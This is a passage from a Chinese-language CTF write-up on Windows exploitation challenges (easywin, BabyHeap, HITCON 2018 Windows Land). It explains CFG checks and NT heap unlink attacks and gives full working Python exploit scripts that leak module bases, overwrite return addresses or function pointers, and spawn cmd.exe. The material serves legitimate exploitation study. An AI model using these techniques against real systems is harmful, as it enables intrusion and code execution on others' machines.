printf((char *)(v2 + 0x100), v2, (unsigned int)(v9 % 100), v8);
result = (*(__int64 (__fastcall **)(__int64))(v2 + 0x200))(v2);
continue;
}
// ...

首先,这个调用的参数正好书buffer本身;其次,其buffer中包含格式化字符串。
同时,很容易发现,在edit中:

1
2
3
4
5
6
7
8
9
10
v2 = (__int64)fgets(v0, 0x208, v1);
if ( v2 )
{
v2 = -1i64;
do
++v2;
while ( v0[v2] );
if ( v2 && v0[v2 - 1] == 10 )
v0[v2 - 1] = 0;
}

这里是可以写入0x208 bytes数据的,也就是说直接给了一个覆盖函数指针的操作;同时配合attack中的格式化字符串,还可以进行一次leak,需要注意的是,windows下是无法通过”%n”这种操作完成任意地址写的,”$”也无法使用。

Windows CFG(Control Flow Gaurd)

简单来说,CFG通过在间接跳转前插入校验代码,检查目标地址是否合法,从而可以组成程序控制流被劫持到非预期的地方。
而从细节上讲,比如:

1
2
3
4
5
6
.text:00007FF6862A17BD                 mov     rbx, [rdi+200h]
.text:00007FF6862A17C4 mov rcx, rbx
.text:00007FF6862A17C7 call cs:__guard_check_icall_fptr
.text:00007FF6862A17CD mov rcx, rdi
.text:00007FF6862A17D0 call rbx
.text:00007FF6862A17D2 jmp short loc_7FF6862A17E3

这里需要call rbx,不过首先需要通过__guard_check_icall_fptrrbx的位置进行一个校验。
而在win10里,这个__guard_check_icall_fptr的实现其实就是ntdll!LdrpValidateUserCallTarget

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
unsigned __int64 __fastcall LdrpValidateUserCallTarget(unsigned __int64 func_addr)
{
__int64 bitmap; // rdx
unsigned __int64 bit_offset; // rax

bitmap = CFGBitmap[func_addr >> 9];
bit_offset = func_addr >> 3;
if ( (func_addr & 0xF) != 0 )
{
bit_offset &= 0xFFFFFFFFFFFFFFFEui64;
if ( !_bittest64(&bitmap, bit_offset) )
return LdrpHandleInvalidUserCallTarget();
LABEL_5:
bit_offset |= 1ui64;
if ( _bittest64(&bitmap, bit_offset) )
return bit_offset;
return LdrpHandleInvalidUserCallTarget();
}
if ( !_bittest64(&bitmap, bit_offset) )
goto LABEL_5;
return bit_offset;
}

简单来说,这个check流程就是:

  1. func_addr >> 9得到对应CFGBitmap数组的下标,这里的原因是:

    • CFGBitmap原理是8 bytes对应1 bit,换句话说,就是8 bytes的虚拟地址空间是用CFGBitmap中的1 bit标记的;所以这里需要右移3。

    • CFGBitmap数组是以QWORD单位存的,故bitmap也是以8 bytes也就是64 bit取的,进行判断的时候下标最大为2^6-1,即需要6 bit表示下标;所以这里需要右移6。

    • 所以最后func_addr >> 9才得到对应CFGBitmap数组的下标。

      综上,被check的func_addr实际上被分为了三个部分:

      1
      2
      3
      4
      5
      +---------------------+------------------+--------+
      | 55 bits | 6 bits | 3 bits |
      +---------------------+------------------+--------+
      | offset in CFGBitmap | offset in bitmap | left |
      +---------------------+------------------+--------+
  2. 如果func_addr的低4 bits不为0,也就是func_addr不是0x10对齐的,就会同时检查两个bit,一个是bit_offset & 0xFFFFFFFFFFFFFFFE,一个是bit_offset | 1,举个例子:

    • 如果func_addr = 0x101,那么检查bitoffset = 0x20以及``bitoffset = 0x21`;

    • 如果func_addr = 0x10F,那么检查bitoffset = 0x20以及``bitoffset = 0x21`;

      换句话说,在func_addr没有0x10对齐的情况下,最后判断的相应的bitmap中的bit是同样的,故结果也是同样的。
      且只有在这两个bit均为1的情况下,才能通过检查,否则都会判为无效,从而转入异常处理,也不会进行跳转。

  3. 如果func_addr的低4 bits为0,也就是func_addr是0x10对齐的,那么会先后检查bit_offsetbit_offset | 1,举个例子:

    • 如果func_addr = 0x100,那么检查bitoffset = 0x20;如果此时bit_offset对应的bit为0,则再给一次机会,检查bit_offset | 1是否为1;如果为1,那么目标地址有效,否则无效。

    换句话说,在func_addr是0x10对齐的情况下,只要bit_offsetbit_offset | 1的其中一个对应的bit是1,那么目标地址都是有效的。

  4. 至于为何这里涉及了两个bit的检查,就不得而知了。

而至于CFGBitmap是如何生成的,涉及到比较复杂的细节
对于动态链接库dll中的一些导出函数,其在CFGBitmap中对应的bit都是共享的,也就是说要么都合法,要么都不合法。
而若仅仅针对当前进程,则有几个比较重要的相关结构,在_load_config_usedv中可以看到

1
2
3
4
.rdata:00007FF6862A3830                 dq offset __guard_check_icall_fptr ; GuardCFCheckFunctionPointer
.rdata:00007FF6862A3838 dq offset __guard_dispatch_icall_fptr ; GuardCFDispatchFunctionPointer
.rdata:00007FF6862A3840 dq offset __guard_fids_table ; GuardCFFunctionTable
.rdata:00007FF6862A3848 dq 0Eh ; GuardCFFunctionCount
  • __guard_check_icall_fptr:前面已经提到过,实际指向ntdll!LdrpValidateUserCallTarget,做具体的检查。
  • __guard_dispatch_icall_fptr:实际上就只是jmp rax,不知作何用。
  • __guard_fids_table:该进程合法的跳转地址,也就是一个函数指针表,在程序加载的时候会完成从该RVA列表到具体CFGBitmap中对应bit的转化。
  • GuardCFFunctionCount:即RVA列表中函数指针的个数。

利用思路

  1. 首先利用上述提到的格式化字符串漏洞,leak出ucrtbase的基地址。注意由于windows程序和linux不一样,其运行的加载基址貌似在相当长的一段时间里是不会变化的(或许是不重启机器就不会变),dll的加载地址也是如此;所以一次leak,全程受用。
  2. 之后利用edit的溢出,覆盖函数指针为system,并布置buffer为”type,pwn\westworld.txt”,调用attack就会将flag打印出来。这里直接system("cmd.exe")弹了shell后无法交互,所以只能直接读flag了。
    这里还有个点就是,因为我们是没法输入空格的,所以”type flag.txt”这样的字符串是输不进去的,所以利用了一个小小的trick,也就是”type,flag.txt”中”,”在这里可以等同于空格来使用,完成这个bypass。
  3. 这里可以通过调试,跟到LdrpValidateUserCallTarget中进行判断,system确实是合法地址;而至于为什么system是合法地址,这里猜测dll的导出函数可能都会是合法的跳转地址,但是无法进行验证;这样,CFG的保护在这里似乎就没有什么作用了。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
from winpwn import *
import sys

context.arch = 'amd64'
context.log_level = 'debug'

p = process("./easywin.exe")
# p = remote("node3.buuoj.cn", 27068)

if len(sys.argv) == 2 and sys.argv[1] == '1':
windbgx.attach(p)

def choose(choice):
p.sendlineafter("Choice? ", choice)

def add(content, item):
choose('a')
p.sendlineafter("Target planet? ", content)
p.sendlineafter("Type?", item)

def edit(idx, content):
choose('c')
p.sendlineafter("ID? ", str(idx))
p.sendafter("New target planet? ", content)

def delete(idx):
choose('d')
p.sendlineafter("ID? ", str(idx))

def attack():
choose('ll')

# add('AAA', 'd')
# edit(0, 'A' * 0xff + '\x00' + "%p" * 5 + "ucrtbase.dll:%p" + context.newline)
# attack()
# p.recvuntil('ucrtbase.dll:')
# ucrtbase = int(p.recv(16), 16) - 0xE59F8
ucrtbase = 0x7ffe46b20000
system = ucrtbase + 0xA40C0

add('AAA', 'd')
edit(0, 'type,pwn\\westworld.txt'.ljust(0x100, "\x00") + 'A' * 0xff + "\x00" + p64(system))
attack()

print("[+] ucrtbase: " + hex(ucrtbase))

p.interactive()

[Windows][OGeek2019]BabyHeap & [Windows][ASIS 2017]Babyheap

题目分析

传统的菜单题,其中adddeleteshow都没有问题,只有edit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
else if (chunk_status[dwBytes])
{
v16 = 0;
puts("And what's the length this time?");
if (scanf("%d", &v16) != 1)
goto LABEL_49;
getchar();
puts("Then name it again : ");
v11 = v16;
v4 = 0;
v13 = chunk_array[dwBytes];
v9 = getchar();
do
{
if (v9 == 10)
break;
v13[v4++] = v9;
v9 = getchar();
} while (v4 != v11);
}

显然存在一个heap overflow。

利用思路

  1. 由于edit功能没有自动在末尾补”\x00”,所以可以通过这个leak出下一个chunk头,它是被Encoding xor加密过的,我们可以通过手动还原出原chunk头然后跟加密过的头进行xor,从而得到Encoding;同样地可以leak出heap地址。因为这个heap是通过hHeap = HeapCreate(1u, 0x2000u, 0x2000u);单独申请的,所以仅供当前线程使用,因此布局可预测,比较简单。
  2. 不同在于,linux下heap overflow通过覆盖fd,来劫持fastbin或者tcache bin的链表,达到任意地址写的目的。windows下的freelist是一个双向链表,所以要通过类似于unsorted bin的unlink attack进行利用,从而获得一个指向自己的指针。
  3. 通过提供的shoot功能,我们要将该chunk对应的chunk_status中的标志置为1,从而使得可写,进而达到任意地址读写的目的。
  4. 有了任意地址读写,就可以利用如下的一条leak链:
    1
    IAT ==> kernel32 ==> ntdll ==> ntdll!PebLdr - 0x44 ==> PEB ==> TEB ==> StackBase ==> return address
    从而找到main函数的返回地址在栈上的位置。
  5. 接下来就是覆盖返回地址执行system("cmd.exe")了。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
from winpwn import *
import sys

context.arch = 'i386'
context.log_level = 'debug'

# p = process("./babyheap.exe")
p = remote("node3.buuoj.cn", 29639)

if len(sys.argv) == 2 and sys.argv[1] == '1':
windbgx.attach(p)

def choose(choice):
p.sendlineafter("What's your choice?", str(choice))

def add(size, content):
choose(1)
p.sendlineafter("How long is your sword?", str(size))
p.sendlineafter("Well done! Name it!", content)

def delete(idx):
choose(2)
p.sendlineafter("Which sword do you want to destroy?", str(idx))

def edit(idx, size, content):
choose(3)
p.sendlineafter("Which one will you polish?", str(idx))
p.sendlineafter("And what's the length this time?", str(size))
p.sendlineafter("Then name it again : ", content)

def show(idx):
choose(4)
p.sendlineafter("Which one will you check?", str(idx))
p.recvuntil("Show : ")

def quit():
choose(5)

def shoot(addr):
choose(1337)
p.sendlineafter("So what's your target?", str(addr))

def get_pie():
p.recvuntil("And here is your Novice village gift : 0x")
pie = int(p.recvline()[:-2], 16) - 0x1090
return pie

def ctor_heap_head(size, flags, prev_size, remain_size):
chksum = ((size >> 3) & 0xff) ^ ((size >> 3) >> 8) ^ flags
val = (size >> 3) | (flags << 16) | (chksum << 24) | (prev_size >> 3 << 32) | (remain_size << 56)
return val

def leak_info(chunk_array, addr):
edit(1, 0x8, p32(chunk_array + 4) + p32(addr))
show(2)
val = u32(p.recvline()[:-2].ljust(4, "\x00")[:4])
return val

PIE = get_pie()
chunk_array = PIE + 0x4370
chunk_status = PIE + 0x43BC
puts_iat = PIE + 0x30C8
heapfree_iat = PIE + 0x3004
ret_from_main = PIE + 0x193b

# create three chunks
add(0x68, "AAA") # chunk 0
add(0x68, "BBB") # chunk 1
add(0x68, "CCC") # chunk 2
add(0x68, "DDD") # chunk 3
add(0x68, "EEE") # chunk 4

# leak heap head and calculate encoding
edit(1, 0x68, "B" * 0x60 + "heaphead")
show(1)
p.recvuntil("heaphead")
heap_head = u64(p.recv(6) + '\x00\x08')
encoding = heap_head ^ ctor_heap_head(0x70, 0x01, 0x70, 0x08)

# leak freelist address
edit(1, 0x76, "B" * 0x6E + "freelist")
show(1)
p.recvuntil("freelist")
freelist = u32(p.recvline()[:-2].rjust(4, "\x00")) + 0xc0

# fix chunk 2 head
edit(1, 0x70, "B" * 0x68 + p64(heap_head))

# unlink attack
delete(1)
delete(3)
edit(0, 0x78, 'A' * 0x68 + p64(ctor_heap_head(0x70, 0x00, 0x70, 0x00) ^ encoding) + p32(chunk_array) + p32(chunk_array + 4))
delete(0)

# now chunk_array[1] points to itself
# leak address
shoot(chunk_status + 1)
ucrtbase = leak_info(chunk_array, puts_iat) - 0x95A30 #0xb48d0
system = ucrtbase + 0xB8320 #0xec730
kernel32 = leak_info(chunk_array, heapfree_iat) - 0x13FC0 #0x1df60
kernel32_atol = kernel32 + 0x81800 #0x81B70

# leak ntdll
ntdll = leak_info(chunk_array, kernel32_atol) - 0x72980 #0x76870
ntdll_peb_addr = ntdll + 0x10eb84 #0x125d34

# leak peb and teb
PEB = leak_info(chunk_array, ntdll_peb_addr) - 0x44
TEB = PEB + 0x3000

# leak stack address
stack_end = leak_info(chunk_array, TEB + 6) << 16

# find where return address is stored
ret_addr_pos = stack_end - 4
while True:
if leak_info(chunk_array, ret_addr_pos) == ret_from_main:
break
else:
ret_addr_pos -= 4

# hijack ret address
edit(1, 0x14, p32(chunk_array + 4) + p32(ret_addr_pos) + p32(0) + "cmd.exe\x00")
edit(2, 0x10, p32(system) + p32(0) + p32(chunk_array + 0x10))

# getshell
quit()

print("[+] PIE base is: " + hex(PIE))
print("[+] Encoding is: " + hex(encoding))
print("[+] Freelist address is: " + hex(freelist))
print("[+] ucrtbase address is: " + hex(ucrtbase))
print("[+] kernel32 address is: " + hex(kernel32))
print("[+] ntdll address is: " + hex(ntdll))
print("[+] PEB address is: " + hex(PEB))
print("[+] TEB address is: " + hex(TEB))
print("[+] stack_end address is: " + hex(stack_end))
print("[+] return address lies on: " + hex(ret_addr_pos))
print("[+] system address is: " + hex(system))

p.interactive()

[Windows][HITCON 2018]Windows Land

题目分析

典型的菜单题,但是比较繁杂,总的来说,就是有五种操作:

1
2
3
4
5
create
list
edit
delete
exit

以及五个操作对象:

1
2
3
4
5
1) Teacher
2) Engineer
3) Doctor
4) Athlete
5) Pig

由于是C++程序,仔细分析可以发现,五种对象都是以vector形式存储的,增删通过相应的push_backerase进行。

而其中比较与众不同的是Engineer,它的成员里包含一个动态分配的指针,也就是language成员变量:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
// create function

// ...
printf("What language> ");
v41 = 0i64;
while ( read(0, &DstBuf, 1u) > 0 )
{
if ( (_BYTE)DstBuf == 10 )
{
*((_BYTE *)info_buf + v41) = 0;
break;
}
*((_BYTE *)info_buf + v41++) = DstBuf;
if ( v41 >= 0x100 )
break;
}
v56 = 0i64;
v57 = age;
v55 = name_buf[0];
v58 = 0i64;
v59 = (&carrier_array)[carrier_idx];
v60 = salary;
if ( LOBYTE(info_buf[0]) )
{
v0 = (unsigned __int64)malloc((unsigned int)(unsigned __int8)random_padding + 512);
v58 = v0;
*(_OWORD *)v0 = info_buf[0];
*(_DWORD *)(v0 + 16) = info_buf[1];
*(_WORD *)(v0 + 20) = WORD2(info_buf[1]);
v42 = BYTE6(info_buf[1]);
*(_BYTE *)(v0 + 22) = BYTE6(info_buf[1]);
}
if ( (void *)engineer_array_capacity == *(&engineer_array_start + 1) )
{
sub_7FF6C3CF3740(v42, *(&engineer_array_start + 1), &v55);
v0 = v58;
}
else
{
sub_7FF6C3CF1130(*(&engineer_array_start + 1), &v55);
*(&engineer_array_start + 1) = (char *)*(&engineer_array_start + 1) + 48;
}
if ( v0 )
free((void *)v0);
break;
// ...

这里先mallocfree的是一个局部变量,在进行push_back中会进行拷贝,也就是会再分配一个同样大小的buffer作为language,并把0x18 bytes的数据复制进去。

而漏洞存在于:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
// edit function

// ...
rsi14 = rsi13 - 1;
if (!rsi14)
{
rdi50 = 0i64;
r10_50 = ((_BYTE *)*(&engineer_array_start + 1) - (_BYTE *)engineer_array_start) / 48;
if (r10_50)
{
for (r9_51 = 0i64;; r9_51 += 48i64)
{
rax52 = (unsigned __int8 *)engineer_array_start + r9_51;
do
{
ecx53 = rax52[(char *)info_buf - ((_BYTE *)engineer_array_start + r9_51)];
edx53 = *rax52 - ecx53;
if (edx53)
break;
++rax52;
} while (ecx53);
if (!edx53)
break;
if (++rdi50 >= r10_50)
return printf("edit failed\n");
}
printf("What language> ");
memset(info_buf, 0, sizeof(info_buf));
while (read(0, DstBuf, 1u) > 0)
{
if (DstBuf[0] == 10)
{
*((_BYTE *)info_buf + rbx1) = 0;
break;
}
*((_BYTE *)info_buf + rbx1++) = DstBuf[0];
if (rbx1 >= 0x100)
break;
}
rcx64 = (_DWORD *)*((_QWORD *)engineer_array_start + 6 * rdi50 + 3);
if (LOBYTE(info_buf[0]))
{
if (rcx64) // uaf here
{
eax66 = info_buf[1];
*(_OWORD *)rcx64 = info_buf[0];
rcx64[4] = eax66;
*((_WORD *)rcx64 + 10) = WORD2(info_buf[1]);
*((_BYTE *)rcx64 + 22) = BYTE6(info_buf[1]);
}
else
{
sub_7FF6C3CF11D0((__int64)engineer_array_start + 48 * rdi50, (__int64)info_buf);
}
}
else if (rcx64)
{
free(rcx64); // free but not set zero
return printf("edit succeed\n");
}
return printf("edit succeed\n");
}
return printf("edit failed\n");
}
// ...

也就是在editEngineer->language的时候,如果第一个字节为”\x00”,那么就会直接触发free,但是并不会置为0(当然正常地edit也是可以的,但是只能写0x18 bytes到buffer里面)。所以,这里存在UAF可以利用。

利用思路

  1. 由于windows的heap比较复杂,而且经过不断地调试发现,其布局是不可预测的,所以不太可能像linux下一样通过偏移直接定位到目标chunk;再加上程序刚开始读了一个随机数(0x00 ~ 0xF0),每次对Engineer->language进行malloc的时候,都会在0x200的基础上加上该随机数,使得heap布局更加无法预测。经过长时间地调试发现,可以通过其他类型的操作对象(如teacher等)先对heap上的碎片进行占位,考虑到vector的增长方式是1、2、3、4、6、9、13、19、28、...(capacity),对应的size为0x30、0x60、0x90、0xc0、0x120、0x1B0、0x270、0x390、0x540、...,因此将相应的几个vector占到0x270 bytes大小的chunk,之后对Engineer进行操作的时候,heap布局就会稍微稳定一些:
    1
    2
    3
    4
    5
    6
    7
    0000021d873d7110 0028 0013  [00]   0000021d873d7120    00270 - (busy) ==> vector doctor 
    0000021d873d7390 0028 0028 [00] 0000021d873d73a0 00270 - (busy) ==> vector athlete
    0000021d873d7610 0028 0028 [00] 0000021d873d7620 00270 - (free) ==> vector engineer (old old)
    0000021d873d7890 0028 0028 [00] 0000021d873d78a0 00270 - (busy) ==> vector teacher
    0000021d873d7b10 003a 0028 [00] 0000021d873d7b20 00390 - (free) ==> vector engineer (old)
    0000021d873d7eb0 0055 003a [00] 0000021d873d7ec0 00540 - (busy) ==> vector engineer
    0000021d873d8400 00bc 0055 [00] 0000021d873d8410 00bb0 - (free)
    0x0000021d873d7ec0这个chunk还没有拿到的时候是一个大的freed状态的块,其Blink指向的是0x0000021d873d7620
  2. 同时发现,Engineer->name是没有自动在结尾补”\x00”的,再加上其位置为chunk的Flink所在位置,紧挨着Blink,而且进行拷贝构造的时候,Blink也会拷贝到这个vector中,所以可以通过Engineer->name来对heap进行一个leak,从而找到目标Engineervector的准确位置(也就是leak出来的Blink + 0x280 + 0x280 + 0x3a0 = Blink + 0x8a0)。
  3. 由于vector Engineer的size达到0x540的时候,其成员个数在20 ~ 28变化不会改变vector的大小,所以可以利用这几个成员对Engineer->language进行操作,比如这里我们申请出7个language的buffer进行后续利用(实际上用不上这么多):
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    000001fbc7797fa0 0028 0028  [00]   000001fbc7797fb0    00270 - (free)
    000001fbc7798220 0028 0028 [00] 000001fbc7798230 00270 - (busy)
    000001fbc77984a0 003a 0028 [00] 000001fbc77984b0 00390 - (free)
    000001fbc7798840 0055 003a [00] 000001fbc7798850 00540 - (busy) ==> vector engineer
    000001fbc7798d90 002c 0055 [00] 000001fbc7798da0 002b0 - (busy) ==> language[20]
    000001fbc7799050 002c 002c [00] 000001fbc7799060 002b0 - (busy) ==> language[21]
    000001fbc7799310 002c 002c [00] 000001fbc7799320 002b0 - (free) ==> language[22]
    000001fbc77995d0 002c 002c [00] 000001fbc77995e0 002b0 - (busy) ==> language[23]
    000001fbc7799890 002c 002c [00] 000001fbc77998a0 002b0 - (free) ==> language[24]
    000001fbc7799b50 002c 002c [00] 000001fbc7799b60 002b0 - (busy) ==> language[25]
    000001fbc7799e10 002c 002c [00] 000001fbc7799e20 002b0 - (busy) ==> language[26]
    000001fbc779a0d0 00ef 002c [00] 000001fbc779a0e0 00ee0 - (free)
    000001fbc779afc0 0004 00ef [00] 000001fbc779afd0 00030 - (busy)
    这里显示的是依次free(language[22]); free(language[24]);的状态,然后利用UAF改掉language[22]FlinkBlink,进行unlink attack。
    这样,vector engineer相应成员的language(记为victim_1)就指向了自己,从而可以借此进行任意地址读写。
  4. 这里采用先让该victim指向另一个未被删除的language(记为victim_2)的位置,从而避免了如果直接修改victim_1本身,那么完成了一次任意地址写之后,就控不回victim_1的情况了;另外,由于language是不会被打印出来的,这里要通过修改engineer的另一个类成员的title指针,使其指向另一个未被修改的title指针,从而在list的时候将text的地址打印出来。同样的方法,可以leak任意可读地址的数据。
  5. 需要注意的是,由于我们后续的目标是执行system("cmd.exe"),并且该调用会触发内存分配的操作,所以要求heap结构处于合法的状态,否则会被检测从而报错退出。因此,只要将victim_1的原FlinkBlink的双向链表进行修复即可。
  6. 之后就是一个标准操作,通过binary的IAT表,leak出ntdllucrtbase的基址,并通过ntdll!PebLdr上方存在的PEB相关地址leak出PEB并且计算出TEB的位置(两者偏移固定),然后将TEB->StackLimit给leak出来得到该进程的栈地址,最后通过暴力搜索找到main函数的返回地址。
  7. 最后通过任意地址写在main函数返回地址处写入ROP,从而在返回时触发调用system("cmd.exe")

虽然windows的heap还是具有一定的不确定性,成功率不是100%,主要在于最开始以0x8a0作为偏移这里可能会有不确定性,但是本地的交互速度以及准确率还是很可观的,马上就能有结果。
比较恶心的,本地尚且无法100%,加上远程环境毕竟和我本地的win10不同,所以实际在打远程的时候一度让我怀疑人生,一直都是失败,最后终于是成功了一次。
虽然我曾花了很大的功夫,企图提高成功率,但终究无果,不知道有没有更好的方法。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
from winpwn import *
import sys

context.log_level = 'error'
context.arch = 'amd64'

# p = process("./windowsland.exe")

p = remote("node3.buuoj.cn", 26564)
# p = remote("127.0.0.1", 10000)

# if len(sys.argv) == 2 and sys.argv[1] == "1":
# windbgx.attach(p)

menu = [
"create",
"edit",
"list",
"delete",
"exit"
]

def choose_func(idx):
p.sendlineafter(">> ", menu[idx])

def add_teacher(age, name, subject):
choose_func(0)
p.sendlineafter("age> ", str(age))
p.sendlineafter("name> ", name)
p.sendlineafter("What kind of human> ", "1")
p.sendlineafter("Which college> ", "1")
p.sendlineafter("What subject> ", subject)

def add_engineer(age, name, language):
choose_func(0)
p.sendlineafter("age> ", str(age))
p.sendlineafter("name> ", name)
p.sendlineafter("What kind of human> ", "2")
p.sendlineafter("What salary> ", "1")
p.sendlineafter("Which title> ", "1")
p.sendlineafter("What language> ", language)

def add_doctor(age, name, hospital):
choose_func(0)
p.sendlineafter("age> ", str(age))
p.sendlineafter("name> ", name)
p.sendlineafter("What kind of human> ", "3")
p.sendlineafter("How long> ", "1")
p.sendlineafter("Which hospital> ", hospital)

def add_athlete(age, name, sport):
choose_func(0)
p.sendlineafter("age> ", str(age))
p.sendlineafter("name> ", name)
p.sendlineafter("What kind of human> ", "4")
p.sendlineafter("Which country> ", "1")
p.sendlineafter("What sport> ", sport)

def add_pig(age, name):
choose_func(0)
p.sendlineafter("age> ", str(age))
p.sendlineafter("name> ", name)
p.sendlineafter("What kind of human> ", "5")
p.sendlineafter("How heavy> ", "1")
p.sendlineafter("How tall> ", "1")
p.sendlineafter("Which kind> ", "1")

def edit_teacher(name, subject):
choose_func(1)
p.sendlineafter("What kind of human> ", "1")
p.sendlineafter("name> ", name)
p.sendlineafter("Which subject> ", subject)

def edit_engineer(name, language):
choose_func(1)
p.sendlineafter("What kind of human> ", "2")
p.sendlineafter("name> ", name)
p.sendlineafter("What language> ", language)

def edit_doctor(name, hospital):
choose_func(1)
p.sendlineafter("What kind of human> ", "3")
p.sendlineafter("name> ", name)
p.sendlineafter("Which hospital> ", hospital)

def edit_athlete(name, hospital):
choose_func(1)
p.sendlineafter("What kind of human> ", "4")
p.sendlineafter("name> ", name)
p.sendlineafter("Which hospital> ", hospital)

def show_all():
choose_func(2)

def delete_teacher(name):
choose_func(3)
p.sendlineafter("What kind of human> ", "1")
p.sendlineafter("name> ", name)

def delete_engineer(name):
choose_func(3)
p.sendlineafter("What kind of human> ", "2")
p.sendlineafter("name> ", name)

def delete_doctor(name):
choose_func(3)
p.sendlineafter("What kind of human> ", "3")
p.sendlineafter("name> ", name)

def delete_athlete(name):
choose_func(3)
p.sendlineafter("What kind of human> ", "4")
p.sendlineafter("name> ", name)

def delete_pig(name):
choose_func(3)
p.sendlineafter("What kind of human> ", "5")
p.sendlineafter("name> ", name)

def quit():
choose_func(4)

def leak_info(target_item, addr):
edit_engineer("22", p64(target_item + 0x30) + p64(addr))
show_all()
p.recvuntil("Engineer 23(23) was promoted as ")
return u64(p.recvuntil(',', timeout=1)[:-1].ljust(8, "\x00")[:8])

while True:
try:
for i in range(10):
add_doctor(i, str(i), str(i))

for i in range(10):
add_athlete(i, str(i), str(i))

add_engineer(0, "heapaddr", "")
for i in range(1, 10):
if i == 1:
add_engineer(i, str(i), "")
else:
add_engineer(i, str(i), "")

for i in range(10):
add_teacher(i, str(i), str(i))

for i in range(10, 20):
add_engineer(i, str(i), "")

for i in range(20, 27):
add_engineer(i, str(i), str(i))

show_all()
p.recvuntil("heapaddr")
heap_addr = u64(p.recvuntil("(0)").replace('\r\n', '\n')[:-3].ljust(8, "\x00"))

assert heap_addr != 0, "heap address should not be 0!"

current_engineer_vector = heap_addr + 0x8a0 # not always right
target_item = current_engineer_vector + 0x438

# unlink attack
edit_engineer("22", "")
edit_engineer("24", "")
edit_engineer("22", p64(target_item - 8) + p64(target_item))
edit_engineer("21", "")

# # use chunk 22 to control chunk 23
edit_engineer("22", p64(target_item + 0x30))

# now 22 points to itself
engineer_24_chunk = leak_info(target_item, target_item + 0x60)
assert(engineer_24_chunk != u64("Engineer")) # not always success

if len(sys.argv) == 2 and sys.argv[1] == "1":
windbgx.attach(p)
break

except:
p.close()
# p = remote("127.0.0.1", 10000)
p = remote("node3.buuoj.cn", 26564)
# p = process("./windowsland.exe")

# fix double linked list
engineer_25_chunk = leak_info(target_item, target_item + 0x90)
chunk_size = engineer_25_chunk - engineer_24_chunk

engineer_22_chunk_flink = current_engineer_vector - 0x3a0
engineer_22_chunk_blink = engineer_24_chunk
engineer_22_chunk = current_engineer_vector + 0x550 + chunk_size * 2
engineer_22_chunk_blink_blink = leak_info(target_item, engineer_22_chunk_blink + 8)

edit_engineer("22", p64(engineer_22_chunk_flink + 8))
edit_engineer("23", p64(engineer_22_chunk_blink))
edit_engineer("22", p64(engineer_22_chunk_blink))
edit_engineer("23", p64(engineer_22_chunk_flink) + p64(engineer_22_chunk_blink_blink))

# leak textaddr
text_base = leak_info(target_item, target_item + 0x68) - 0x6418

# leak ntdll
RtlLookupFunctionEntry_iat = text_base + 0x6210
ntdll = leak_info(target_item, RtlLookupFunctionEntry_iat) - 0x40FB0 #0x32BE0#
ntdll_peb_addr = ntdll + 0x151328 #0x16a448#
malloc_iat = text_base + 0x60F0
urctbase = leak_info(target_item, malloc_iat) - 0x112A0 #0xfda0#
system = urctbase + 0xA40C0 #0xAE5C0#
pop_rcx = urctbase + 0x3526E #0x9209d#
str_cmd_exe = urctbase + 0xC80F0 #0xD0CB0#

# leak peb and teb
PEB = leak_info(target_item, ntdll_peb_addr) - 0x80
TEB = PEB + 0x1000

# leak stack address
stack_end = (leak_info(target_item, TEB + 0x11) << 8) + 0x4000

# find where return address is stored
ret_from_main = text_base + 0x4288
ret_addr_pos = stack_end - 8
while ret_addr_pos > stack_end - 0x3000:
if leak_info(target_item, ret_addr_pos) == ret_from_main:
break
else:
ret_addr_pos -= 8

# info
print("[+] heap address is: " + hex(heap_addr))
print("[+] current engineer vector address should be: " + hex(current_engineer_vector))
print("[+] text address is: " + hex(text_base))
print("[+] ntdll base is: " + hex(ntdll))
print("[+] urctbase base is: " + hex(urctbase))
print("[+] ntdll_peb_addr address is: " + hex(ntdll_peb_addr))
print("[+] PEB address is: " + hex(PEB))
print("[+] TEB address is: " + hex(TEB))
print("[+] stack end address is: " + hex(stack_end))
print("[+] ret_addr_pos is: " + hex(ret_addr_pos))

if ret_addr_pos == stack_end - 0x3000:
print("Try again")
exit(1)

# write ret address
edit_engineer("22", p64(ret_addr_pos))
edit_engineer("23", p64(pop_rcx) + p64(str_cmd_exe) + p64(pop_rcx + 1))
edit_engineer("22", p64(ret_addr_pos + 0x18))
